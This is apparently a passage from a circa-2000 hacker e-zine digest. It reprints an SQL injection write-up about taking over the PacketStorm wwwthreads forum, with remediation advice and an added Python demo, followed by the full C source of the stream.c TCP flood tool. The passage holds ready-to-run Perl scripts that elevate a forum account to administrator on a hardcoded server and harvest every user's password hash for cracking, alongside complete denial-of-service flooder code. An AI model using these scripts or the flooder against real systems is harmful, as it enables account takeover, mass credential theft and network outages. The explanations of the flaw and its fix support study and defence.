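The vulnerable model opens default.htm for the padded name even though no .htw file of that name exists, which is exactly the "no .htw files, still vulnerable" case; the hardened check rejects it on length alone. The log scan decodes %20 before looking for padding, so it catches the padded stem whether or not the spaces were encoded in the request.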
For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405

Permission is hereby granted to copy or redistribute this advisory but only in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

@HWA

12.0 "How I hacked Packetstorm Security" by Rainforest Puppy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-- Advisory RFP2K01 ------------------------------ rfp.labs ------------

"How I hacked PacketStorm"
A look at hacking wwwthreads via SQL

------------------------------- rain forest puppy / rfp@wiretrip.net ---

Table of contents:
-1. Scope of problem
-2. Long explanation of SQL hacking
-3. Solution
-4. Conclusion
-5. Included perl scripts

------------------------------------------------------------------------

----[ 1. Scope of problem

Many applications are vulnerable to various forms of SQL hacking. While programmers know they should avoid strcpy() and giving user data to a system() call, many are unaware of how SQL queries can be tampered with. This is more of a technical paper than an advisory, but it does explain how I used a vulnerability in the wwwthreads package to gain administrative access and some 800 passwords to PacketStorm's discussion forum.

----[ 2. Long explanation of SQL hacking

As with any other day, I was surfing around the PacketStorm forums, which use wwwthreads. The URL parameters (the cruft after the '?' in a URL) of the forums started catching my eye. Being the web security puppy I am, I started getting curious. So using an ultra-insightful hacking technique, I changed the 'Board=general' parameter to read 'Board=rfp' used with the showpost.pl script.
Lo and behold I get the following error given to me:

We cannot complete your request. The reason reported was:
Can't execute query: SELECT B_Main,B_Last_Post FROM rfp WHERE B_Number=1 . Reason: Table 'WWWThreads.rfp' doesn't exist

Seeing there's also a 'Number=1' parameter, we can figure this query can be reconstructed as

SELECT B_Main,B_Last_Post FROM $Board WHERE B_Number=$Number

Now, if any of you have read my phrack 54 article (the SQL appension part, available at http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2) you can see where I'm going. We can not only substitute a $Board name and $Number, but also extra SQL commands. Imagine if $Board were to equal

'general; DROP TABLE general; SELECT * FROM general '

This would translate into

SELECT B_Main,B_Last_Post FROM general; DROP TABLE general; SELECT * FROM general WHERE B_Number=$Number

Now the ';' is generic for ending a command. Normally we could use a '#' for mySQL to ignore everything else on the line; however, the 'FROM' clause is on a separate line from the 'WHERE' clause, so mySQL won't ignore it. Considering that invalid SQL will cause mySQL to not run any commands, we at least need to give a valid command string to parse...in this case, we feed a generic select (similar to the original) back to it.

The result of this (theoretically) is to drop (delete) the general forum table. But in reality, it doesn't work. Not because the theory is wrong, but because the database user we're using doesn't have DROP privileges. And due to how wwwthreads is written, it won't quite let you do much with this.

But all is not lost, we can just start changing all numbers left and right, looking for where it blows up...or we can go the easy route and download the (eval) source code from www.wwwthreads.com. Yeah, kind of cheating, but it's not quite a one-to-one solution. You see, the eval code and the license code (of which PacketStorm is running) are slightly different, including their SELECT statements.
So we have to be a little creative. First, let's find the SELECT statement (or equivalent) that's featured above. I like to use less, so I just 'less showpost.pl', and search (the '/' key) for 'SELECT'. We come up with

# Grab the main post number for this thread
$query = qq!
    SELECT Main,Last_Post
    FROM $Board
    WHERE Number=$Number
!;

Wow, that's it...except the field names (Main,Last_Post,Number) are different than the pro version (B_Main,B_Last_Post,B_Number). If we look right above it, we see

# Once and a while it people try to just put a number into the url,
if (!$Number) {
    w3t::not_right("There was a problem looking up the Post...

Which is what limits the use of the $Number parameter.

At this point let's now evaluate 'why' we want to go forth into this. Obviously DROP'ing tables ranks right up there with other stupid DoS tricks. You may be able to modify other people's posts, but that's lame too. Perhaps setting up our own forum? All that information is stored in the DB. But that's a lot of records to update. How about becoming a moderator? Or even better, an administrator? Administrators can add, delete, and modify forums, boards, and users. That may be a worthy goal, although you're still only limited to the realm of the forum, which makes you a king of a very small and pitiful domain.

However, there is one thing worthy. If you make yourself a user account, you'll notice you have to enter a password. Hmmm...those passwords are stored someplace...like, in the database. If we hedge our 'password reuse' theory, and combine it with the fact that wwwthreads (in some configurations) posts the IP address of the poster, we have some possibilities worth checking out.

So, let's look at this password thing. Going into 'edit profile' gives us a password field, which looks an awful lot like a crypt hash (view the HTML source). Damn, so the passwords are hashed. Well, that just means you'll need a password cracker and more time before you can start checking on password reuse.
Assuming we *can* get the passwords......

Let's start with the administrator access first. The adduser.pl script is a good place to start, since it should show us all parameters of a user. Notice the following code

# --------------------------------------
# Check to see if this is the first user
$query = qq!
    SELECT Username
    FROM Users
!;
$sth = $dbh -> prepare ($query) or die "Query syntax error: $DBI::errstr. Query: $query";
$sth -> execute() or die "Can't execute query: $query. Reason: $DBI::errstr";
my $Status = "";
my $Security = $config{'user_security'};
my $rows = $sth -> rows;
$sth -> finish;

# -------------------------------------------------------
# If this is the first user, then status is Administrator
# otherwise they are just get normal user status.
if (!$rows){
    $Status = "Administrator";
    $Security = 100;
}
else {
    $Status = "User";
}

What this does is look to see if any users are defined. If no users are defined, the first user added gets the Status of 'Administrator' and a security level of 100. After that, all added users just get Status=User. So we need to find a way to make our Status=Administrator. A full user record can be seen a little further down...

# ------------------------------
# Put the user into the database
my $Status_q = $dbh -> quote($Status);
$Username_q = $dbh -> quote($Username);
my $Email_q = $dbh -> quote($Email);
my $Display_q = $dbh -> quote($config{'postlist'});
my $View_q = $dbh -> quote($config{'threaded'});
my $EReplies_q = $dbh -> quote("Off");
$query = qq!
    INSERT INTO Users (Username,Email,Totalposts,Laston,Status,Sort,
        Display,View,PostsPer,EReplies,Security,Registered)
    VALUES ($Username_q,$Email_q,0,$date,$Status_q,$config{'sort'},
        $Display_q,$View_q,$config{'postsperpage'},$EReplies_q,$Security,$date)
!;

Now, I should take a moment here and explain the quote() function.
A string value of "blah blah blah", when stuck into a query that looks like "SELECT * FROM table WHERE data=$data" will wind up looking like

SELECT * FROM table WHERE data=blah blah blah

which is not valid. The database doesn't know what to do with the extra two blah's, since they look like commands. Therefore all string data needs to be encapsulated in single quotes ('). Therefore the query should look like

SELECT * FROM table WHERE data='blah blah blah'

which is correct. Now, in my SQL appension article I talk about 'breaking out' of the single quote string by including your own single quote. So if we submitted "blah blah' MORE SQL COMMANDS...", it would look like

SELECT * FROM table WHERE data='blah blah' MORE SQL COMMANDS...'
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                               data we submitted

This causes the SQL engine to interpret the MORE SQL COMMANDS as actual SQL commands, since it figured the 'data' part of the string ended with the second single quote (the one we submitted). This is a drawback of converting data into a 'human readable' string, to be parsed back into data again...it's hard to determine what's 'code/commands' and what's 'data'.

All is not lost, however. By submitting a '', it tells the SQL engine to NOT end the data string, but rather only think of it as a single quote in the data context. Therefore the following query

SELECT * FROM table WHERE data='data''more data'

makes the database look for the value "data'more data". So to keep people from breaking out of strings and submitting extra SQL commands, all you have to do is double up every single quote (turn ' into ''). This will ensure that all data is indeed considered data. And this is what the DBI->quote() function does--it will put single quotes around the string, and double all single quotes in the string.

So after all of that explanation, the short of it is that anything that is run through quote() is of no use to us, because we can't submit extra SQL commands or otherwise tamper with anything fun.
And if you look, wwwthreads uses quote() extensively. So this may be rough. But all is not lost...

You see, there are different field types. You can have strings, boolean values, various numeric values, etc. While a string field needs to be in the format of field='data', a numeric field doesn't use the '' (i.e. numeric_field='2' is invalid). The correct syntax for numeric fields is numeric_field=2. Ah ha! There's no quotes to deal with, and you can't even use quotes anyways. The correct solution is to make sure all numeric field data is indeed numeric (more on this later). But I'll give you a hint...wwwthreads doesn't go that far (nor do most applications, actually).

So, now we need a SQL statement that preferably deals with a table we are interested in. A SELECT statement (retrieves data) is tougher, since we'll need to include a whole 'nother query to do something other than SELECT. INSERT and UPDATE are nice because we're already modifying data...we can just ride in more data to update (hopefully). Poking around brings us to a very nice spot...changeprofile.pl. This is the script that takes data entered in editprofile.pl and enters the changes into the database. Of course, the profile is our user profile. This means to use this, we need a valid user account. In any event, let's have a look-see...
# Format the query words
my $Password_q = $dbh -> quote($Password);
my $Email_q = $dbh -> quote($Email);
my $Fakeemail_q = $dbh -> quote($Fakeemail);
my $Name_q = $dbh -> quote($Name);
my $Signature_q = $dbh -> quote($Signature);
my $Homepage_q = $dbh -> quote($Homepage);
my $Occupation_q = $dbh -> quote($Occupation);
my $Hobbies_q = $dbh -> quote($Hobbies);
my $Location_q = $dbh -> quote($Location);
my $Bio_q = $dbh -> quote($Bio);
my $Username_q = $dbh -> quote($Username);
my $Display_q = $dbh -> quote($Display);
my $View_q = $dbh -> quote($View);
my $EReplies_q = $dbh -> quote($EReplies);
my $Notify_q = $dbh -> quote($Notify);
my $FontSize_q = $dbh -> quote($FontSize);
my $FontFace_q = $dbh -> quote($FontFace);
my $ICQ_q = $dbh -> quote($ICQ);
my $Post_Format_q= $dbh -> quote($Post_Format);
my $Preview_q = $dbh -> quote($Preview);

Ack! Practically everything is quoted! That means all those parameters are useless to us. And let's peek at the final actual query that sticks all our information back into the database

# Update the User's profile
my $query =qq!
    UPDATE Users
    SET Password = $Password_q,
        Email = $Email_q,
        Fakeemail = $Fakeemail_q,
        Name = $Name_q,
        Signature = $Signature_q,
        Homepage = $Homepage_q,
        Occupation = $Occupation_q,
        Hobbies = $Hobbies_q,
        Location = $Location_q,
        Bio = $Bio_q,
        Sort = $Sort,
        Display = $Display_q,
        View = $View_q,
        PostsPer = $PostsPer,
        EReplies = $EReplies_q,
        Notify = $Notify_q,
        TextCols = $TextCols,
        TextRows = $TextRows,
        FontSize = $FontSize_q,
        FontFace = $FontFace_q,
        Extra1 = $ICQ_q,
        Post_Format = $Post_Format_q,
        Preview = $Preview_q
    WHERE Username = $Username_q
!;

Since wwwthreads nicely slaps the '_q' on the variables, it's easy to see. See it? $Sort, $PostsPer, $TextCols, and $TextRows aren't quoted.
Now, let's figure out where that data comes from

my $Sort = $FORM{'sort_order'};
my $PostsPer = $FORM{'PostsPer'};
my $TextCols = $FORM{'TextCols'};
my $TextRows = $FORM{'TextRows'};

Wow, they're taken straight from the submitted form data. That means they are not checked or validated in any way. Here's our chance!

Going back to the structure of the user record (given above), there's a 'Status' field we need to change. Looking in this UPDATE query, Status isn't listed. So this means that the Status field is going to remain unchanged. Bummer. See what we're going to do yet? Take a second and think about it. Remember, all of this hinges around the fact that we want to submit what looks like data, but in the end, the SQL engine/database will interpret it differently.

Notice in the query that the fields are listed in the format of field=value, field=value, field=value, etc (of course, they're on separate lines). If I were to insert some fake values (for the sake of example), I might have

Name='rfp', Signature='rfp', Homepage='www.wiretrip.net/rfp/'

All I did was put the fields on the same line, collapse the whitespace, and fill in the (quoted) string values. This is valid SQL. Now, let's put this all together. Looking at the 'Sort' variable (which is numeric), we would feasibly have

Bio='puppy', Sort=5, Display='threaded'

which is still valid SQL. Since $Sort=$FORM{'sort_order'}, that means the above value for Sort was given by submitting the parameter sort_order=5. Now, let's use Sort to our advantage. What if we were to include a comma, and then some more column values? Oh, say, the Status field? Let's set the sort_order parameter to "5, Status='Administrator',", and then let it run its course. Eventually we'll get a query that looks like

Bio='puppy', Sort=5, Status='Administrator', Display='threaded'
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^
                  our submitted data

This is still valid SQL! And furthermore, it will cause the database to update the Status field to be 'Administrator'!
But remember when we looked in adduser.pl, the first user had a Security level of 100. We want that too, so we just set the sort_order parameter to "5, Status='Administrator', Security=100,", and then we get

Bio='puppy', Sort=5, Status='Administrator', Security=100, ...

which updates both values to what we want. The database, not knowing any better, will update those two fields, and now the forums will think we're an administrator.

So I go to apply this new technique on PacketStorm...and get a 404 for requests to changeprofile.pl. Yep, the pro version doesn't have it. Navigating the 'Edit Profile' menu, I see that it has 'Basic Profile', 'Display Preferences', and 'Email Notifications/Subscriptions', which the demo does not (it's all lumped together). Wonderful. If they changed the scripts around, they may have also changed the SQL queries (well they had to, actually). So now we're in 'blackbox' mode (blindly making educated guesses on what's going on).

Since we want to play with the sort_order parameter still, you'll see that it's contained in the 'Display Preferences' script (editdisplay.pl). This script handles the sort_order, display, view, PostPer, Post_Format, Preview, TextCols, TextRows, FontSize, FontFace, PictureView, and PicturePost (gained by viewing the HTML source). So it's a subset of the parameters. Using the above code snippets, we can guess at what the SQL query looks like. So why not give it a shot.

First I poke some invalid values into sort_order (characters instead of numbers). This causes an error, which I figured. Just as, in the first example, the fields were prefixed 'B_' for the 'Board' table, the 'User' table (which we are now using) prefixes columns with a 'U_'. So that means we need to use 'U_Status' and 'U_Security' for field names. Good thing we checked. Since this needs to be a valid form submit, we need to submit values for all of the listed variables.
At this point I should also point out (again) we need a valid user account of which to increase the status. We'll need the username and password (hash), which are printed as hidden form elements on various forms (like editdisplay.pl). You'll see the parameters are Username and Oldpass. So based on all of this, we can construct a URL that looks like

changedisplay.pl?
Cat=&
Username=rfp
&Oldpass=(valid password hash)
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100
&display=threaded
&view=collapsed
&PostsPer=10
&Post_Format=top
&Preview=on
&TextCols=60
&TextRows=5
&FontSize=0
&FontFace=
&PictureView=on
&PicturePost=off

The important one of course being

&sort_order=5,U_Status%3d'Administrator',U_Security%3d100

which is just an escaped version of what we used above (the %3d translates to the '=' character). When you lump it all together into a single string, you get

changedisplay.pl?Cat=&Username=rfp&Oldpass=(valid password hash)
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded
&view=collapsed&PostsPer=10&Post_Format=top&Preview=on&TextCols=60
&TextRows=5&FontSize=0&FontFace=&PictureView=on&PicturePost=off

which, while gross, is what it needs to be. So, I submit this to PacketStorm, and get

Your display preferences have been modified.

Wonderful. But, noticing on the top menu, I see an 'Admin' option now. I click it, and what do I see but the heart warming message of

As an Administrator the following options are available to you.

Bingo! Administrator privileges! Looking at my options, I can edit users, boards, or forums, assign moderators and administrators, ban users/hosts, expire/close/open threads, etc.

Now for our second objective...the passwords. I go into 'Show/Edit Users', and am asked to pick the first letter of the usernames I'm interested in. So I pick 'R'. A list of all 'R*' users comes up. I click on 'rfp'. And there we go, my password hash. Unfortunately, there's no nice and easy way to dump all users and their hashes.
Bummer. So I automated a perl script to do it for me, and dump the output in a format that can be fed into John the Ripper.

----[ 3. Solution

Now, how to defend against this? As you saw, the reason this worked was due to non-restricted data being passed straight into SQL queries. Luckily wwwthreads quoted (most) string data, but they didn't touch numeric data. The solution is to make sure numeric data is indeed numeric. You can do it the 'silent' way by using a function like so

sub onlynumbers { ($data=shift)=~tr/0-9//cd; return $data;}

And similar to how all string data is passed through DBI->quote(), pass all numeric data through onlynumbers(). So, for the above example, it would be better to use

my $Sort = onlynumbers($FORM{'sort_order'});

Another area that needs to be verified is the table name. In our very first example, we had 'Board=general'. As you see here, a table name is not quoted like a string. Therefore we also need to run all table names through a function to clean them up as well. Assuming table names can have letters, numbers, and periods, we can scrub it with

sub scrubtable { ($data=shift)=~tr/a-zA-Z0-9.//cd; return $data;}

which will remove all other cruft.

In the end, *all* (let me repeat that... **ALL**) incoming user data should be passed through quote(), onlynumbers(), or scrubtable()...NO EXCEPTIONS! Passing user data straight into a SQL query is asking for someone to tamper with your database.

New versions of wwwthreads are available from www.wwwthreads.com, which implement the solutions pretty much as I've described them here.

----[ 4. Conclusion

I've included two scripts below. wwwthreads.pl will run the query for you against a pro version of wwwthreads. You just have to give the ip address of the server running wwwthreads, and a valid user and password hash. w3tpass.pl will walk and download all wwwthreads user password hashes, and give output suitable for password cracking with John the Ripper.
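As an added example (mine, not rfp's code and not wwwthreads), the unquoted-numeric-field problem from section 2 and the quote()/onlynumbers() defences from section 3 run end to end against a constructed SQLite table with a handful of the Users columns the article names. The table layout, the Python rendering of DBI->quote() and onlynumbers(), and the stricter reject-and-bind variant are my assumptions, not the project's own code.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the wwwthreads Users table (hypothetical schema,
    only the columns the article talks about)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Bio TEXT, Sort INTEGER,"
               " Status TEXT, Security INTEGER)")
    db.execute("INSERT INTO Users VALUES ('rfp', '', 1, 'User', 0)")
    return db


def quote(value):
    """What the article says DBI->quote() does: wrap the value in single quotes
    and double every single quote inside it."""
    return "'" + str(value).replace("'", "''") + "'"


def onlynumbers(value):
    """The article's onlynumbers() sub (tr/0-9//cd) written in Python: keep digits only."""
    return re.sub(r"[^0-9]", "", str(value))


def vulnerable_update(db, username, bio, sort_order):
    """The changeprofile.pl pattern: string columns pass through quote(), but the
    numeric Sort column is spliced into the statement exactly as submitted."""
    query = "UPDATE Users SET Bio = %s, Sort = %s WHERE Username = %s" % (
        quote(bio), sort_order, quote(username))
    db.execute(query)
    db.commit()
    return query


def scrubbed_update(db, username, bio, sort_order):
    """The article's fix: numeric input goes through onlynumbers() before use."""
    query = "UPDATE Users SET Bio = %s, Sort = %s WHERE Username = %s" % (
        quote(bio), onlynumbers(sort_order) or "0", quote(username))
    db.execute(query)
    db.commit()
    return query


def strict_update(db, username, bio, sort_order):
    """Stricter variant (my addition, not from the article): reject anything that is
    not an integer instead of silently scrubbing it, and let the driver bind values."""
    if not re.fullmatch(r"[0-9]+", str(sort_order)):
        raise ValueError("sort_order must be an integer")
    db.execute("UPDATE Users SET Bio = ?, Sort = ? WHERE Username = ?",
               (bio, int(sort_order), username))
    db.commit()


def user_row(db, username):
    """(Bio, Sort, Status, Security) for one user."""
    return db.execute("SELECT Bio, Sort, Status, Security FROM Users WHERE Username = ?",
                      (username,)).fetchone()


if __name__ == "__main__":
    payload = "5, Status='Administrator', Security=100"   # the article's sort_order value
    db = make_db()
    print(vulnerable_update(db, "rfp", "puppy", payload))
    print(user_row(db, "rfp"))        # ('puppy', 5, 'Administrator', 100)
    db = make_db()
    scrubbed_update(db, "rfp", "puppy", payload)
    print(user_row(db, "rfp"))        # ('puppy', 5100, 'User', 0)
```

Two things worth seeing in the output. A breakout attempt through a quoted column (a Bio of "x', Status='Administrator") is stored as literal text because quote() doubled the embedded quote, exactly as the article explains; only the unquoted Sort column lets the extra assignments through. And the 'silent' onlynumbers() scrub does keep Status and Security untouched, but it turns the payload into Sort=5100, a value the user never asked for, which is why the stricter variant that refuses non-numeric input and binds parameters is shown alongside it.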
Thanks to PacketStorm for being a good sport about this.

- Rain Forest Puppy / rfp@wiretrip.net - I feel a rant coming on...

----[ 5. Included perl scripts

-[ wwwthreads.pl

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net

use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

sub sendraw {
    my ($pstr)=@_;
    my $target;
    $target= inet_aton($ip) || die("inet_aton problems");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
        die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,80,$target)){
        select(S); $|=1;
        print $pstr;
        my @in=<S>;
        select(STDOUT); close(S);
        return @in;
    } else { die("Can't connect...\n"); }
}

-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net

use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";

#####################################################

@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');

print
STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";

foreach $let (@letts){
    $parms="Cat=&Start=$let";
    $tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
    "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
    "Cookie: Username=$username; Password=$passhash\r\n\r\n";
    my @D=sendraw($tosend);
    foreach $line (@D){
        if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
            push @users, $1;}}}

$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
    "Fetching individual passwords...\r\n";

foreach $user (@users){
    $parms="User=$user";
    $tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
    "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
    "Cookie: Username=$username; Password=$passhash\r\n\r\n";
    my @D=sendraw($tosend);
    foreach $line (@D){
        if($line=~/OldPass value = "([^"]+)"/){
            ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
            $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
            print $user.':'.$pass."::::::::::\n";
            last;}}}

print STDERR "done.\r\n\r\n";

sub sendraw {
    my ($pstr)=@_;
    my $target;
    $target= inet_aton($ip) || die("inet_aton problems");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
        die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,80,$target)){
        select(S); $|=1;
        print $pstr;
        my @in=<S>;
        select(STDOUT); close(S);
        return @in;
    } else { die("Can't connect...\n"); }
}

# Greets to everyone who hasn't used RDS to deface a website (small crowd)

--- rain forest puppy / rfp@wiretrip.net ------------- ADM / wiretrip ---
SQL hacking has many ins, many outs; there's many levels of complexity...
--- Advisory RFP2K01 ------------------------------ rfp.labs ------------

@HWA

13.0 The stream.c exploit
~~~~~~~~~~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif

struct ip_hdr {
    u_int   ip_hl:4,        /* header length in 32 bit words */
            ip_v:4;         /* ip version */
    u_char  ip_tos;         /* type of service */
    u_short ip_len;         /* total packet length */
    u_short ip_id;          /* identification */
    u_short ip_off;         /* fragment offset */
    u_char  ip_ttl;         /* time to live */
    u_char  ip_p;           /* protocol */
    u_short ip_sum;         /* ip checksum */
    u_long  saddr, daddr;   /* source and dest address */
};

struct tcp_hdr {
    u_short th_sport;       /* source port */
    u_short th_dport;       /* destination port */
    u_long  th_seq;         /* sequence number */
    u_long  th_ack;         /* acknowledgement number */
    u_int   th_x2:4,        /* unused */
            th_off:4;       /* data offset */
    u_char  th_flags;       /* flags field */
    u_short th_win;         /* window size */
    u_short th_sum;         /* tcp checksum */
    u_short th_urp;         /* urgent pointer */
};

struct tcpopt_hdr {
    u_char  type;           /* type */
    u_char  len;            /* length */
    u_short value;          /* value */
};

struct pseudo_hdr {         /* See RFC 793 Pseudo Header */
    u_long  saddr, daddr;   /* source and dest address */
    u_char  mbz, ptcl;      /* zero and protocol */
    u_short tcpl;           /* tcp length */
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
    /* struct tcpopt_hdr opt; */
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;

void usage(char *progname)
{
    fprintf(stderr, "Usage: %s <dstaddr> <dstport> <pktsize> <pps>\n", progname);
    fprintf(stderr, "    dstaddr - the target we are trying to attack.\n");
    fprintf(stderr, "    dstport - the port of the target, 0 = random.\n");
    fprintf(stderr, "    pktsize - the extra size to use. 0 = normal syn.\n");
    exit(1);
}

/* This is a reference internet checksum implementation, not very fast */
inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    /* Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits. */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *) w;
        sum += answer;
    }

    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);  /* add hi 16 to low 16 */
    sum += (sum >> 16);                  /* add carry */
    answer = ~sum;                       /* truncate to 16 bits */
    return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
        fprintf(stderr, "Could not resolve %s.\n", hostname);
        exit(1);
    }
    return *(u_long *)hp->h_addr;
}

void flooder(void)
{
    struct timespec ts;
    int i;

    memset(&packet, 0, sizeof(packet));
    ts.tv_sec = 0;
    ts.tv_nsec = 10;

    packet.ip.ip_hl = 5;
    packet.ip.ip_v = 4;
    packet.ip.ip_p = IPPROTO_TCP;
    packet.ip.ip_tos = 0x08;
    packet.ip.ip_id = rand();
    packet.ip.ip_len = FIX(sizeof(packet));
    packet.ip.ip_off = 0;           /* IP_DF? */
    packet.ip.ip_ttl = 255;
    packet.ip.ip_dst.s_addr = random();

    packet.tcp.th_flags = 0;
    packet.tcp.th_win = htons(16384);
    packet.tcp.th_seq = random();
    packet.tcp.th_ack = 0;
    packet.tcp.th_off = 5;          /* 5 */
    packet.tcp.th_urp = 0;
    packet.tcp.th_dport = dstport?htons(dstport):rand();

    /* packet.opt.type = 0x02;
       packet.opt.len = 0x04;
       packet.opt.value = htons(1460); */

    cksum.pseudo.daddr = dstaddr;
    cksum.pseudo.mbz = 0;
    cksum.pseudo.ptcl = IPPROTO_TCP;
    cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));

    s_in.sin_family = AF_INET;
    s_in.sin_addr.s_addr = dstaddr;
    s_in.sin_port = packet.tcp.th_dport;

    for(i=0;;++i) {
        /* patched by 3APA3A to send 1 syn packet + 1023 ACK packets. */
        if( !(i&0x4FF) ) {
            packet.tcp.th_sport = rand();
            cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random();
            packet.tcp.th_flags = TH_SYN;
            packet.tcp.th_ack = 0;
        } else {
            packet.tcp.th_flags = TH_ACK;
            packet.tcp.th_ack = random();
        }
        /* cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); */
        ++packet.ip.ip_id;
        /*++packet.tcp.th_sport*/;
        ++packet.tcp.th_seq;

        if (!dstport)
            s_in.sin_port = packet.tcp.th_dport = rand();

        packet.ip.ip_sum = 0;
        packet.tcp.th_sum = 0;

        cksum.tcp = packet.tcp;

        packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
        packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
        if (sendto(sock, &packet, sizeof(packet), 0,
                   (struct sockaddr *)&s_in, sizeof(s_in)) < 0)
            perror("jess");
    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("stream.c v1.0 - TCP Packet Storm\n");
    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("socket");
        exit(1);
    }
    setgid(getgid());
    setuid(getuid());
    if (argc < 4)
        usage(argv[0]);
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
        perror("setsockopt");
        exit(1);
    }
    srand((time(NULL) ^ getpid()) + getppid());
    printf("\nResolving IPs...");
    fflush(stdout);
    dstaddr = lookup(argv[1]);
    dstport = atoi(argv[2]);
    pktsize = atoi(argv[3]);
    printf("Sending...");
    fflush(stdout);
    flooder();
    return 0;
}

@HWA

14.0 Spank, variation of the stream.c DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

------------------------------------------------
Explanation of the 'spank' attack -- a new breed stream/raped
------------------------------------------------

By: lst (yardley@uiuc.edu)

This is a tad different than the previous release. Stream/Raped merely flooded the host with ack's (or no flags) and came from random ips with random sequence numbers and/or ack numbers. The difference now is that this not only does the previous stuff, but also directly attacks from and to multicast addresses as well. Just as before, rate limiting should be done to counteract its effect (the same idea as ICMP_BANDLIM). The multicast handling should also be checked to verify that it is behaving properly.

The attacker specifies the port[s] that they want to send the attack to; depending on what ports are selected, you will have different net results. If the port is an open port, then you will possibly have a longer kernel path to follow before the drop. Therefore, a smart attacker will hit open ports, but havoc can also come about from random ports due to states and processing.

In the best case scenario, you will experience only the lag of the flood and the lag of the processing (currently) and then be fine when the attacker stops. In the worst case, you lock up, kill the network, and possibly have to reboot. Once you patch it, you deal with a lot less processing time (the drops are handled without the RST flag when appropriate--bandlim type idea). In other words, you go to the drop routine instead of dropwithrst, silencing your response, which decreases your processing time, the hit on your network, and the effect of the flood (once a threshold is reached, all those bad packets are silently dropped and the attack has less of a net effect).

